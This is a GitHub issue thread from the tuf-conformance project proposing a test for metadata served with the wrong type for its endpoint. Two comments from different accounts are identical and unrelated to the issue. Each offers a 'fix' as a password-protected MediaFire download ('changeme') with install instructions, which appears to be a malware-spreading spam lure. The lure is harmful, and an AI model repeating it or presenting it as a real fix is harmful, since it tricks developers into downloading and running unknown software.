### ISSUE TITLE
test wrong metadata type

### ISSUE THREAD

**Issue by jku** [theupdateframework/tuf-conformance#180]
from @segiddins :

> what if the fetched metadata has the wrong type for the endpoint?

I thought originally this is just another for form of "malformed metadata" but maybe an implementation might deserialize as generic metadata and then forgets to verify type in which case this could be a different issue. A little far fetched but testing is cheap: let's test this, it should be easy after #155

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
